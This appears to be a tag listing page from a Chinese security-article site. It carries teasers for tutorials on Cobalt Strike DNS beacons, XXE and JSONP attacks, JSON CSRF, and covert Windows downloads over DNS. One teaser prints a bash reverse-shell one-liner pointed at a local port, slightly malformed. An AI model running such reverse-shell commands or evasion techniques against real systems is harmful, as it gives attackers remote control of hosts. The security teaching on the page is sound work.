传输数据 - 第 2 | CN-SEC 中文网

安全文章

Cobalt Strike的使用（二）

三、DNS BeaconDNS隧道简介利用DNS隧道进行攻击的现象已存在多年，将数据封装在DNS协议中传输，大部分防火墙和入侵检测设备很少会过滤DNS流量，僵尸网络和入侵攻击可几乎无限制地加以利用，实...

08月01日21 views评论

阅读全文

安全新闻

Meta 被欧盟处以 13 亿美元罚款

欧洲的通用数据保护条例 GDPR 刚刚给了它最大的打击。自欧洲大陆严格的数据规则生效以来将近整整五年，Meta 因将数亿欧洲人的数据发送到美国而被处以 12 亿欧元（13 亿美元）的巨额罚款...

05月23日33 views评论

阅读全文

安全百科

【答疑解惑】使用JSON格式传输数据可以实现CSRF吗？

答案是：一般情况下，最新版本浏览器下无法实现JSON CSRF。最新版本浏览器包括网传flash+307跳转攻击方法只能在旧版浏览器适用，在2018年后更新版本的几乎所有浏览器，307跳转的时候并没有...

04月23日34 views评论

阅读全文

安全百科

必备基础-集线器,交换机与路由器有什么区别?

注：本文旨在简单的说明集线器、交换机与路由器的区别，因而忽略了很多细节。三者实际的发展过程和工作原理并非文中所写的这么简单。如果你看完本文能大概了解到三者的异同，本文的目的就达到了。至于更具体的技术问...

10月09日47 views评论

阅读全文

安全文章

XXE漏洞—从入门到入土

前言这篇文章简单的说一说XXE漏洞吧，说说漏洞原理和一些利用方式。说漏洞之前，先来了解一下，什么是XML吧。什么是XML？XML是Extensible Markup Language（可扩展标识语言）...

07月21日36 views评论

阅读全文

Linux bash 反弹Shell

反弹：bash -I >& /tcp/dev/127.0.0.1/9999 0>&1反弹（反向）：被控制端连接攻击者，攻击者监听端口等待被控制端连接我们bash -I 创建...

07月18日安全文章23 views评论

阅读全文

SecIN安全技术社区

Windows远程下载新方案搭建使用DNS服务器传输数据

前言参加护网的伙计们可能经常会遇到在目标主机上已经可以执行命令但是因为杀软拦着无法远程下载（比如powershell，certutil，vbs，Bitsadmin），或者循环写入遇到负载均衡，以及目...

04月16日153 views已关闭评论

阅读全文

安全文章

3种XXE不同攻击方式

3种XXE不同攻击方式Web/移动应用程序，Word处理器，Web服务和内容管理平台使用可扩展标记语言（XML）格式在人类可读和机器可读格式的系统之间存储和传输数据。如果未正确验证XML数据的输入，则...

02月10日97 views评论

阅读全文

SecIN安全技术社区

JSONP从漏洞原理到漏洞挖掘

什么是JSONP劫持漏洞要了解jsonp接触漏洞，我们需要先了解这个概念：同源策略简单讲，同源策略指的是只有同协议、同域名、同端口的服务可以传输数据，而不同的网站无法传输数据，用于保证我们传输...

11月19日147 views已关闭评论

阅读全文

Cobalt Strike的使用（二）

【答疑解惑】使用JSON格式传输数据可以实现CSRF吗？

必备基础-集线器,交换机与路由器有什么区别?

XXE漏洞—从入门到入土

Linux bash 反弹Shell

Windows远程下载新方案搭建使用DNS服务器传输数据

3种XXE不同攻击方式

JSONP从漏洞原理到漏洞挖掘

在线咨询

微信